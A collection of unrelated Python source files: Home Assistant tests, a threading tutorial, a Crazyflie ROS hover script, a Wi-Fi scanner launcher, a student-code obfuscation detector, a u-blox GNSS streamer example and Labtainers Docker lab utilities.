self.services.call('test_domain', 'i_do_not_exist', blocking=True))
ha.SERVICE_CALL_LIMIT = orig_limit
class TestConfig(unittest.TestCase):
def setUp(self): # pylint: disable=invalid-name
""" things to be run when tests are started. """
self.config = ha.Config()
def test_config_dir_set_correct(self):
""" Test config dir set correct. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant"),
self.config.config_dir)
def test_path_with_file(self):
""" Test get_config_path method. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(os.path.join(data_dir, ".homeassistant", "test.conf"),
self.config.path("test.conf"))
def test_path_with_dir_and_file(self):
""" Test get_config_path method. """
data_dir = os.getenv('APPDATA') if os.name == "nt" \
else os.path.expanduser('~')
self.assertEqual(
os.path.join(data_dir, ".homeassistant", "dir", "test.conf"),
self.config.path("dir", "test.conf"))
def test_temperature_not_convert_if_no_preference(self):
""" No unit conversion to happen if no preference. """
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_not_convert_if_invalid_value(self):
""" No unit conversion to happen if no preference. """
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
('25a', TEMP_CELCIUS),
self.config.temperature('25a', TEMP_CELCIUS))
def test_temperature_not_convert_if_invalid_unit(self):
""" No unit conversion to happen if no preference. """
self.assertEqual(
(25, 'Invalid unit'),
self.config.temperature(25, 'Invalid unit'))
def test_temperature_to_convert_to_celcius(self):
self.config.temperature_unit = TEMP_CELCIUS
self.assertEqual(
(25, TEMP_CELCIUS),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(26.7, TEMP_CELCIUS),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_temperature_to_convert_to_fahrenheit(self):
self.config.temperature_unit = TEMP_FAHRENHEIT
self.assertEqual(
(77, TEMP_FAHRENHEIT),
self.config.temperature(25, TEMP_CELCIUS))
self.assertEqual(
(80, TEMP_FAHRENHEIT),
self.config.temperature(80, TEMP_FAHRENHEIT))
def test_as_dict(self):
expected = {
'latitude': None,
'longitude': None,
'temperature_unit': None,
'location_name': None,
'time_zone': 'UTC',
'components': [],
'version': __version__,
}
self.assertEqual(expected, self.config.as_dict())
class TestWorkerPool(unittest.TestCase):
def test_exception_during_job(self):
pool = ha.create_worker_pool(1)
def malicious_job(_):
raise Exception("Test breaking worker pool")
calls = []
def register_call(_):
calls.append(1)
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (malicious_job, None))
pool.add_job(ha.JobPriority.EVENT_DEFAULT, (register_call, None))
pool.block_till_done()
self.assertEqual(1, len(calls))
|
Thread.py
|
import threading
import time
def saygi(num):
print("running on number:%s" %num)
time.sleep(3)
if __name__ == '__main__':
t1 = threading.Thread(target=saygi, args=(1,))
t2 = threading.Thread(target=saygi, args=(2,))
t1.start()
t2.start()
print(t1.getName())
print(t2.getName())
class MyThread(threading.Thread):
def __init__(self, num):
threading.Thread.__init__(self)
self.num = num
def run(self):
print("running on number of :%s" %self.num)
time.sleep(3)
if __name__ == '__main__':
t1 = MyThread(1)
t2 = MyThread(2)
t1.start()
t2.start()
#线程锁
def addNum():
global num
print('___get num:',num)
time.sleep(1)
lock.acquire() # 修改数据前加锁
num -= 1 # 对此公共变量进行-1操作
lock.release() # 修改后释放
num = 100 # 设定一个共享变量
thread_list = []
lock = threading.Lock() # 生成全局锁
for i in range(100):
t = threading.Thread(target=addNum)
t.start()
thread_list.append(t)
for t in thread_list: # 等待所有线程执行完毕
t.join()
print('final num:', num)
|
Hover.py
|
#!/usr/bin/env python
import rospy
import numpy as np
import tf
from crazyflie_driver.msg import Hover
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from threading import Thread
from geometry_msgs.msg import PoseStamped
class Crazyflie:
def __init__(self, prefix):
self.prefix = prefix
worldFrame = rospy.get_param("~worldFrame", "/world")
self.hz = 10
self.rate = rospy.Rate(self.hz)
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
self.update_params = rospy.ServiceProxy(prefix + '/update_params', UpdateParams)
self.setParam("kalman/resetEstimation", 1)
self.hover_cmd_pub = rospy.Publisher(prefix + "/cmd_hover", Hover, queue_size=1)
self.hover_cmd_sub = rospy.Subscriber("cf_hover/set_hover",PoseStamped,queue_size=1)
self.msg = Hover()
self.msg.header.seq = 0
self.msg.header.stamp = rospy.Time.now()
self.msg.header.frame_id = worldFrame
self.msg.yawrate = 0
self.stop_pub = rospy.Publisher(prefix + "/cmd_stop", Empty, queue_size=1)
self.stop_msg = Empty()
#note: format is [x,y,z,vs,vy,vz]
self.hover_z=0.4
self.takeoff_pos = np.array([0.0,0.0,self.hover_z,0.0,0.0,0.0])
self.traj = []
self.traj_init = False
# determine direction of speed based on distance
def getSpeed(self, distance):
if distance > 0:
return 0.1
elif distance < 0:
return -0.1
else:
return 0
def setParam(self, name, value):
rospy.set_param(self.prefix + "/" + name, value)
self.update_params([name])
# x, y is the x, y distance relative to itself
# z is absolute z distance
# TODO: solve 0
def goTo (self, x, y, zDistance, yaw):
duration = 0
duration_x = 0
duration_y = 0
duration_z = 0
vx = 0
vy = 0
z = self.msg.zDistance # the zDistance we have before
z_scale = self.getSpeed(z) # the z distance each time z has to increment, will be changed
# for x, in secs
if x != 0:
duration_x = abs(x/0.1)
vx = self.getSpeed(x)
# for y, in secs
if y != 0:
duration_y = abs(y/0.1)
vy = self.getSpeed(y)
duration_z = abs(z-zDistance)/0.1
durations = [duration_x, duration_y, duration_z]
duration = max(durations)
if duration == 0:
return
elif duration == duration_x:
# x is the longest path
vy *= abs(y/x)
z_scale *= abs((z-zDistance)/x)
elif duration == duration_y:
# y is the longest path
vx *= abs(x/y)
z_scale *= abs((z-zDistance)/y)
elif duration == duration_z:
# z is the longest path
vx *= abs(x/(z-zDistance))
vy *= abs(y/(z-zDistance))
print(vx)
print(vy)
print(z_scale)
print(duration)
start = rospy.get_time()
while not rospy.is_shutdown():
self.msg.vx = vx
self.msg.vy = vy
self.msg.yawrate = 0.0
self.msg.zDistance = z
if z < zDistance:
print(zDistance)
print(z)
z += z_scale
else:
z = zDistance
now = rospy.get_time()
if (now - start > duration):
break
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
rospy.loginfo("sending...")
rospy.loginfo(self.msg.vx)
rospy.loginfo(self.msg.vy)
rospy.loginfo(self.msg.yawrate)
rospy.loginfo(self.msg.zDistance)
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
# take off to z distance
def takeOff(self, zDistance):
time_range = 1 + int(10*zDistance/0.4)
while not rospy.is_shutdown():
for y in range(time_range):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = y / 25.0
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
for y in range(20):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
break
#generate a line trajectory in x,y,z, vx,vy,vz.
#target=[x,y,z], time = s
def gen_traj_line(self,target,duration):
rospy.loginfo("generating trajectory")
#example: circle traj
start=np.copy(self.takeoff_pos)
end=np.copy(target)
n_segs = self.rate*duration
#calculate constand vel going from start to target
vel = (end[0:3]-start[0:3])/duration
self.traj = np.zeros((n_segs,6))
#fill in position waypoints
for i in range(3):
self.traj[:,i]=np.linspace(start[i],end[i],n_segs)
#fill in velocity waypoints
for i in range(3):
self.traj[:,i+3]=np.repeat(vel[i],n_segs)
self.traj_init=True
#
#generate a circle trajectory in x,y,z, vx,vy,vz.
#radius = m, time = s
#assumes the center is in the -x direction of the quadrotor takeoff position
def gen_traj_circle(self,radius,duration):
rospy.loginfo("generating trajectory")
#example: circle traj
start=np.copy(self.takeoff_pos)
center = start[0]-radius
n_segs = self.rate*duration
#calculate constand vel going from start to target
progress_traj = np.linspace(0,1,n_segs)*2*np.pi
self.traj = np.zeros((n_segs,6))
#fill in circle xyz waypoints
self.traj[:,0]=np.cos(progress_traj)*radius-radius+start[0]
self.traj[:,1]=np.sin(progress_traj)*radius+start[1]
self.traj[:,2]=np.zeros(n_segs)+start[2]
#fill in circle xyz vel waypoints
self.traj[:,3]=-np.sin(progress_traj)*radius
self.traj[:,4]=np.cos(progress_traj)*radius
self.traj_init=True
def follow_traj(self,duration):
if not self.traj_init:
rospy.logerr("ERROR: tried to follow traj but no traj initialized")
return
#start = rospy.get_time()
traj_i=0
while not rospy.is_shutdown():
self.msg.vx = self.traj[traj_i,3]
self.msg.vy = self.traj[traj_i,4]
self.msg.yawrate = 0.0
self.msg.zDistance = self.traj[traj_i,2]
now = rospy.get_time()
if (now - start > duration):
break
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
rospy.loginfo("sending...")
rospy.loginfo(self.msg.vx)
rospy.loginfo(self.msg.vy)
rospy.loginfo(self.msg.yawrate)
rospy.loginfo(self.msg.zDistance)
self.hover_cmd_pub.publish(self.msg)
if traj_i<np.shape(self.traj,1)-1:
traj_i=traj_i+1
self.rate.sleep()
# land from last zDistance
def land (self):
# get last height
zDistance = self.msg.zDistance
while not rospy.is_shutdown():
while zDistance > 0:
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.hover_cmd_pub.publish(self.msg)
self.rate.sleep()
zDistance -= 0.2
self.stop_pub.publish(self.stop_msg)
def handler(cf):
duration = 10
radius = 0.15
cf.gen_traj_circle(radius,duration)
#cf.takeOff(cf.hover_z)
#cf.follow_traj(duration)
cf.goTo(0.4, 0.0, 0.0, 0)
cf.land()
if __name__ == '__main__':
rospy.init_node('traj_follow', anonymous=True)
cf1 = Crazyflie("cf1")
#cf2 = Crazyflie("cf2")
t1 = Thread(target=handler, args=(cf1,))
#t2 = Thread(target=handler, args=(cf2,))
t1.start()
#t2.start()
|
radiomanager.py
|
# -*- coding: utf-8 -*-
import pyric
import pyric.pyw as pyw
import yaml
import pprint
import argparse
import gfiwscan
from time import sleep
from multiprocessing import Process
cardprocesslist=[]
def interface_handler(interface_name):
newhandler = gfiwscan.IWScanner(iface_name=interface_name)
while True:
sleep(0.1)
newhandler.scan()
def main():
interface_name_list = []
config_file = "/opt/geofrenzy/etc/gfiwscan.yaml"
parser = argparse.ArgumentParser()
# parser.add_argument("wireless_interface")
args = parser.parse_args()
with open(config_file, 'r') as f:
doc = yaml.load(f)
ignorelist = doc['ignore']
pprint.pprint(pyw.winterfaces())
for winterface in pyw.winterfaces():
print winterface
dev_dict = pyw.devinfo(winterface)
if dev_dict["mac"] in ignorelist:
print "ignoring " + winterface + " with mac " + dev_dict["mac"]
else:
interface_name_list.append(winterface)
for interface_name in interface_name_list:
p = Process(target=interface_handler, args=(interface_name, ))
p.start()
cardprocesslist.append(p)
pprint.pprint(cardprocesslist)
# scan_instance = IWScanner(iface_name=args.wireless_interface)
# while True:
# time.sleep(0.5)
# scan_instance.scan()
if __name__ == "__main__":
main()
|
obfuscation.py
|
import helpers.common as common
from multiprocessing import Process
import helpers.io as io
import math
statTypes = ["numLines", "numWhitespace", "numComments", "avgIdentLength", "numFunctions", "numDefines", "numMathOps", "lenLongestLine", "numReturns"]
# finds the mean of the data
def getMean(data, key):
total = 0.0
count = 0.0
for element in data:
total = total + float(element[key])
count = count + 1.0
return total / count
# finds the std. deviation of the data
def getDeviation(data, mean, key):
totalDiff = 0.0
count = 0.0
for element in data:
totalDiff = totalDiff + (float(element[key]) - mean)**2.0
count = count + 1.0
normalized = totalDiff / count
return math.sqrt(normalized)
# gets the z-score of a data point
def zScore(score, mean, deviation):
return (score - mean) / deviation
class Stat():
def __init__(self, mean, deviation):
self.mean = mean
self.deviation = deviation
def getStats(students, assign, filename, helpers):
# gather students stats into an array
studentDict = {}
array = []
for student in students:
safeFilename = common.makeFilenameSafe(filename) + "stats.json"
path = helpers.getPreprocessedPath(student, assign.name, safeFilename)
if path != None:
json = io.readJSON(path)
studentDict[student] = json
array.append(json)
return (studentDict, array)
def runAssignment(students, assign, args, helpers):
helpers.printf("Processing assignment '{}' in parellel...\n".format(assign.name))
threshold = args["threshold"]
# clusters for this assignment
clusters = []
# for each specificied file
files = assign.args["files"]
for filename in files:
# get stats from JSON
(studentDict, array) = getStats(students, assign, filename, helpers)
# calculate the stats from all students
stats = {}
for stat in statTypes:
mean = getMean(array, stat)
deviation = getDeviation(array, mean, stat)
stats[stat] = Stat(mean, deviation)
# collect the sum of z-scores for each student
for student in students:
if student in studentDict:
data = studentDict[student]
total = 0.0
for stat in statTypes:
if stats[stat].deviation != 0.0:
total += abs(zScore(data[stat], stats[stat].mean, stats[stat].deviation))
if total >= threshold:
cluster = common.Cluster(False, filename, total)
member = common.Member(student, assign.name, helpers)
cluster.add(member)
clusters.append(cluster)
# save the clusters
def sortFun(a, b):
if a.score < b.score:
return 1
return -1
clusters.sort(sortFun)
results = []
for cluster in clusters:
results.append(cluster.toJSON())
json = io.getJSONString(results, True)
helpers.writeToPostprocessed(json, assign.name, "obfuscation_results.json")
# all done
helpers.printf("Finished '{}'!\n".format(assign.name))
def run(students, assignments, args, helpers):
threads = []
# for each assignment
for assign in assignments:
t = Process(target=runAssignment, args=(students, assign, args, helpers))
threads.append(t)
t.start()
# wait for all to finish
for t in threads:
t.join()
# all done!
return True
|
ubxstreamer.py
|
"""
Example implementation of a threaded UBXMessage streamer
Connects to the receiver's serial port and sets up a
threaded UBXReader process. With the reader process running
in the background, it polls the current PRT, USB, NMEA and MSG
configuration.
You should see the poll responses in the input stream,
or an ACK-NAK (Not Acknowledged) message if that
particular CFG-MSG type is not supported by the receiver.
Created on 2 Oct 2020
@author: semuadmin
"""
from io import BufferedReader
from threading import Thread
from time import sleep
from pyubx2 import UBXMessage, POLL, UBX_MSGIDS
from pyubx2.ubxreader import UBXReader
from serial import Serial, SerialException, SerialTimeoutException
import pyubx2.exceptions as ube
CFGMESSAGES = [
"CFG-ANT",
"CFG-BATCH",
"CFG-CFG",
"CFG-DAT",
"CFG-DGNSS",
"CFG-DOSC",
"CFG-DYNSEED",
"CFG-ESFALG",
"CFG-ESFA",
"CFG-ESFG",
"CFG-ESFWT",
"CFG-ESRC",
"CFG-FIXSEED",
"CFG-GEOFENCE",
"CFG-GNSS",
"CFG-HNR",
"CFG-INF",
"CFG-ITFM",
"CFG-LOGFILTER",
"CFG-MSG",
"CFG-NAV5",
"CFG-NAVX5",
"CFG-NMEA",
"CFG-ODO",
"CFG-PM2",
"CFG-PMS",
"CFG-PRT",
"CFG-PWR",
"CFG-RATE",
"CFG-RINV",
"CFG-RST",
"CFG-RXM",
"CFG-SBAS",
"CFG-SENIF",
"CFG-SLAS",
"CFG-SMGR",
"CFG-SPT",
"CFG-TMODE2",
"CFG-TMODE3",
"CFG-TP5",
"CFG-TXSLOT",
"CFG-USB",
]
class UBXStreamer:
"""
UBXStreamer class.
"""
def __init__(self, port, baudrate, timeout=5, ubx_only=False):
"""
Constructor.
"""
self._serial_object = None
self._serial_thread = None
self._ubxreader = None
self._connected = False
self._reading = False
self._port = port
self._baudrate = baudrate
self._timeout = timeout
self._ubx_only = ubx_only
def __del__(self):
"""
Destructor.
"""
self.stop_read_thread()
self.disconnect()
def connect(self):
"""
Open serial connection.
"""
self._connected = False
try:
self._serial_object = Serial(
self._port, self._baudrate, timeout=self._timeout
)
self._ubxreader = UBXReader(
BufferedReader(self._serial_object), ubxonly=self._ubx_only
)
self._connected = True
except (SerialException, SerialTimeoutException) as err:
print(f"Error connecting to serial port {err}")
return self._connected
def disconnect(self):
"""
Close serial connection.
"""
if self._connected and self._serial_object:
try:
self._serial_object.close()
except (SerialException, SerialTimeoutException) as err:
print(f"Error disconnecting from serial port {err}")
self._connected = False
return self._connected
def start_read_thread(self):
"""
Start the serial reader thread.
"""
if self._connected:
self._reading = True
self._serial_thread = Thread(target=self._read_thread, daemon=True)
self._serial_thread.start()
def stop_read_thread(self):
"""
Stop the serial reader thread.
"""
if self._serial_thread is not None:
self._reading = False
def send(self, data):
"""
Send data to serial connection.
"""
self._serial_object.write(data)
def flush(self):
"""
Flush input buffer
"""
self._serial_object.reset_input_buffer()
def waiting(self):
"""
Check if any messages remaining in the input buffer
"""
return self._serial_object.in_waiting
def _read_thread(self):
"""
THREADED PROCESS
Reads and parses UBX message data from stream
"""
while self._reading and self._serial_object:
if self._serial_object.in_waiting:
try:
(raw_data, parsed_data) = self._ubxreader.read()
# if raw_data:
# print(raw_data)
if parsed_data:
print(parsed_data)
except (
ube.UBXStreamError,
ube.UBXMessageError,
ube.UBXTypeError,
ube.UBXParseError,
) as err:
print(f"Something went wrong {err}")
continue
if __name__ == "__main__":
YES = ("Y", "y", "YES,", "yes", "True")
NO = ("N", "n", "NO,", "no", "False")
PAUSE = 1
print("Enter port: ", end="")
val = input().strip('"')
prt = val
print("Enter baud rate (9600): ", end="")
val = input().strip('"') or "9600"
baud = int(val)
print("Enter timeout (0.1): ", end="")
val = input().strip('"') or "0.1"
timout = float(val)
print("Do you want to ignore any non-UBX data (y/n)? (y) ", end="")
val = input() or "y"
ubxonly = val in NO
print("Instantiating UBXStreamer class...")
ubp = UBXStreamer(prt, baud, timout, ubxonly)
print(f"Connecting to serial port {prt} at {baud} baud...")
if ubp.connect():
print("Starting reader thread...")
ubp.start_read_thread()
print("\nPolling receiver configuration...\n")
# poll the receiver configuration
print("\nPolling port configuration CFG-PRT...\n")
for prt in (0, 1, 2, 3, 4): # I2C, UART1, UART2, USB, SPI
msg = UBXMessage("CFG", "CFG-PRT", POLL, portID=prt)
ubp.send(msg.serialize())
sleep(PAUSE)
# poll all available CFG configuration messages
print("\nPolling CFG configuration CFG-*...\n")
for msgtype in CFGMESSAGES: # ("CFG-USB", "CFG-NMEA", "CFG-NAV5"):
msg = UBXMessage("CFG", msgtype, POLL)
ubp.send(msg.serialize())
sleep(PAUSE)
# poll a selection of current navigation message rates using CFG-MSG
print("\nPolling navigation message rates CFG-MSG...\n")
for msgid in UBX_MSGIDS:
if msgid[0] in (1, 240, 241): # NAV, NMEA-Standard, NMEA-Proprietary
msg = UBXMessage("CFG", "CFG-MSG", POLL, payload=msgid)
ubp.send(msg.serialize())
sleep(1)
print("\n\nPolling complete, waiting for final responses...\n\n")
sleep(PAUSE)
print("\n\nStopping reader thread...")
ubp.stop_read_thread()
print("Disconnecting from serial port...")
ubp.disconnect()
print("Test Complete")
|
labutils.py
|
'''
This software was created by United States Government employees at
The Center for Cybersecurity and Cyber Operations (C3O)
at the Naval Postgraduate School NPS. Please note that within the
United States, copyright protection is not available for any works
created by United States Government employees, pursuant to Title 17
United States Code Section 105. This software is in the public
domain and is not subject to copyright.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import filecmp
import glob
import json
import hashlib
from hashlib import md5
import os
import shutil
import re
import subprocess
import sys
import time
import zipfile
import ParseStartConfig
import ParseLabtainerConfig
import datetime
import getpass
import socket
import fcntl
import struct
import threading
import LabCount
import shlex
import stat
import traceback
import string
import errno
import registry
''' assumes relative file positions '''
here = os.path.dirname(os.path.abspath(__file__))
lab_bin_dir = os.path.join(here, '../lab_bin')
sys.path.append(lab_bin_dir)
import ParameterParser
import InspectLocalReg
import InspectRemoteReg
''' logger is defined in whatever script that invokes the labutils '''
global logger
# Error code returned by docker inspect
SUCCESS=0
FAILURE=1
'''
Version number embeded as a label into each docker image.
Current framework version (per below) must be at least
what is found in the image. This is only used for
framework/image compatibility, to tell a user that a given
lab cannot be run without doing an update.
'''
framework_version = 3
osTypeMap = {}
networkImages = []
# Create a directory path based on input path
# Note: Do not create if the input path already exists as a directory
# If input path is a file, remove the file then create directory
def createDirectoryPath(input_path):
# if it exist as a directory, do not delete (only delete if it is a file)
if os.path.exists(input_path):
# exists but is not a directory
if not os.path.isdir(input_path):
# remove file then create directory
os.remove(input_path)
os.makedirs(input_path)
#else:
# logger.debug("input_path directory (%s) exists" % input_path)
else:
# does not exists, create directory
os.makedirs(input_path)
def isValidLab(lab_path):
# Lab path must exist and must be a directory
if os.path.exists(lab_path) and os.path.isdir(lab_path):
# Assume it is valid lab then
logger.debug("lab_path directory (%s) exists" % lab_path)
else:
logger.error("Invalid lab! lab_path directory (%s) does not exist!" % lab_path)
#traceback.print_exc()
#traceback.print_stack()
sys.exit(1)
def getFirstUnassignedIface(n=1):
''' get the nth network iterface that lacks an assigned IP address '''
iflist = os.listdir('/sys/class/net')
for iface in sorted(iflist):
count = 1
ip = get_ip_address(iface)
if ip is None and n == count:
return iface
count += 1
return None
def get_ip_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sp = struct.pack('256s', str.encode(ifname[:15]))
try:
fc = fcntl.ioctl(s.fileno(), 0x8915, sp)
except:
return None
return socket.inet_ntoa(fc[20:24])
def get_hw_address(ifname):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
if sys.version_info >=(3,0):
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', bytes(ifname, 'utf-8')[:15]))
return ':'.join('%02x' % b for b in info[18:24])
except:
return None
else:
try:
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', str(ifname[:15])))
return ':'.join(['%02x' % ord(char) for char in info[18:24]])
except:
return None
def get_new_mac(ifname):
''' use last two byte of mac address to generate a new mac
intended for use on macvlan '''
# TBD move this hardcoded prefix into some config file?
preface = '02:43:ac:12'
my_mac = get_hw_address(ifname)
parts = my_mac.split(':')
p1 = parts[4]
p2 = parts[5]
full = '%s:%s:%s' % (preface, p1, p2)
return full
def isalphadashscore(name):
# check name - alphanumeric,dash,underscore
return re.match(r'^[a-zA-Z0-9_-]*$', name)
# get docker0 IP address
def getDocker0IPAddr():
#return get_ip_address('docker0')
cmd = "docker inspect -f '{{ .NetworkSettings.IPAddress }}' docker0"
ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if len(output[1].strip()) == 0:
''' is a docker0 master container '''
if len(output[0].strip()) > 0:
return output[0].decode('utf-8').strip()
else:
return None
else:
return get_ip_address('docker0')
# Parameterize my_container_name container
def ParameterizeMyContainer(mycontainer_name, mycontainer_image_name, container_user, container_password, lab_instance_seed,
user_email, labname, lab_path, name, image_info, running_container=None):
retval = True
if running_container == None:
running_container = mycontainer_name
''' copy lab_bin and lab_sys files into .local/bin and / respectively '''
CopyLabBin(running_container, mycontainer_image_name, container_user, lab_path, name, image_info)
cmd = 'docker exec %s script -q -c "chown -R %s:%s /home/%s"' % (mycontainer_name, container_user, container_user, container_user)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd = 'docker exec %s script -q -c "chown root:root /usr"' % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('failed %s' % cmd)
exit(1)
cmd_path = '/home/%s/.local/bin/parameterize.sh' % (container_user)
if container_password == "":
container_password = container_user
version = '0'
if image_info is None or image_info.version is None:
''' is a build, version -1 '''
version = '-1'
else:
#print(str(image_info))
if image_info.version is not None:
version = image_info.version
display = os.getenv('DISPLAY')
command=['docker', 'exec', '-i', running_container, cmd_path, container_user, container_password, lab_instance_seed, user_email, labname, mycontainer_name, version, display ]
logger.debug("About to call parameterize.sh with : %s" % str(command))
#return retval
child = subprocess.Popen(command, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
error_string = child.stderr.read().decode('utf-8')
if len(error_string) > 0:
for line in error_string.splitlines(True):
if not line.startswith('[sudo]') and "LC_ALL" not in line and "ENCRYPT_METHOD" not in line:
logger.error('ParameterizeMyContainer %s' % line)
retval = False
else:
logger.debug(line)
out_string = child.stdout.read().decode('utf-8').strip()
if len(out_string) > 0:
logger.debug('ParameterizeMyContainer %s' % out_string)
if mycontainer_image_name in networkImages:
cmd = "docker exec %s bash -c 'mkdir -p /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed mkdir of /run/sshd')
exit(1)
cmd = "docker exec %s bash -c 'chmod 0755 /run/sshd'" % (mycontainer_name)
if not DockerCmd(cmd):
logger.error('Failed chmod of /run/sshd')
exit(1)
else:
pass
return retval
def DoCmd(cmd):
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
retval = True
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
retval = False
if len(output[0]) > 0:
logger.debug(output[0].decode('utf-8'))
return retval
# Start my_container_name container
def StartMyContainer(mycontainer_name):
retval = True
if IsContainerRunning(mycontainer_name):
logger.error("Container %s is already running!\n" % (mycontainer_name))
sys.exit(1)
command = "docker start %s" % mycontainer_name
logger.debug("Command to execute is (%s)" % command)
if not DoCmd(command):
retval = False
return retval
def AllContainersCreated(container):
clone_names = GetContainerCloneNames(container)
for clone_full in clone_names:
if not IsContainerCreated(clone_full):
return False
return True
# Check to see if my_container_name container has been created or not
def IsContainerCreated(mycontainer_name):
retval = True
command = "docker inspect -f {{.Created}} --type container %s" % mycontainer_name
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
if result == FAILURE:
retval = False
logger.debug("Result of subprocess.call for %s IsContainerCreated is %s (1=>FAILURE)" % (mycontainer_name, result))
return retval
def GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name):
''' return the network address parameter and mac parameter for use in creating a container
or connecting the container to a network. Parse out mac address suffix if it exists,
and adjust the ip address based on clone numbers if the address has a "+CLONE" suffix '''
mac = ''
ip_param = ''
if ':' in mysubnet_ip:
mysubnet_ip, mac_addr = mysubnet_ip.split(':',1)
mac = '--mac-address=%s' % mac_addr
elif mysubnet_ip.lower() == 'auto_mac':
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
if not mysubnet_ip.lower().startswith('auto'):
if '+' in mysubnet_ip:
ip, clone_type = mysubnet_ip.split('+')
if clone_type.lower() == 'clone' or start_config.multi_user == 'clones':
name, role = mycontainer_name.rsplit('.',1)
dumb, offset = name.rsplit('-', 1)
try:
offset_int = int(offset)
except:
logger.error('expected use of clone, but did not find clone counter in %s' % mycontainer_name)
exit(1)
ip_start, ip_suffix = ip.rsplit('.', 1)
ip_suffix_int = int(ip_suffix)
new_suffix = ip_suffix_int + offset_int - 1
if new_suffix > 254:
logger.error('IP address adjusted to invalid value %d %s' % (new_suffix, mysubnet_ip))
exit(1)
ip_param = '--ip=%s.%d' % (ip_start, new_suffix)
elif clone_type.lower() == 'clone_mac' and start_config.multi_user == 'client':
# assuming we are a multiuser client
mac_addr = get_new_mac(start_config.subnets[mysubnet_name].macvlan_use)
mac = '--mac-address=%s' % mac_addr
else:
print('ip %s' % ip)
ip_param = '--ip=%s' % ip
else:
ip_param = '--ip=%s' % mysubnet_ip
return ip_param, mac
def ConnectNetworkToContainer(start_config, mycontainer_name, mysubnet_name, mysubnet_ip):
logger.debug("Connecting more network subnet to container %s" % mycontainer_name)
ip_param, dumb = GetNetParam(start_config, mysubnet_name, mysubnet_ip, mycontainer_name)
command = "docker network connect %s %s %s" % (ip_param, mysubnet_name, mycontainer_name)
logger.debug("Command to execute is (%s)" % command)
result = subprocess.call(shlex.split(command), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
logger.debug("Result of subprocess.call ConnectNetworkToContainer is %s" % result)
return result
def DisconnectNetworkFromContainer(mycontainer_name, mysubnet_name):
logger.debug("Disconnecting more network subnet to container %s" % mycontainer_name)
command = "docker network disconnect %s %s" % (mysubnet_name, mycontainer_name)
logger.debug("Command to execute is (%s)" % command)
ps = subprocess.Popen(shlex.split(command), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
result = 0
if len(output[1]) > 0:
logger.error(output[1].decode('utf-8'))
result = 1;
return result
def SetXhost():
''' allow container root users to access xserver '''
cmd = 'xhost'
ps = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = ps.communicate()
if not 'LOCAL:' in output[0].decode('utf-8'):
cmd = 'xhost local:root'
os.system(cmd)
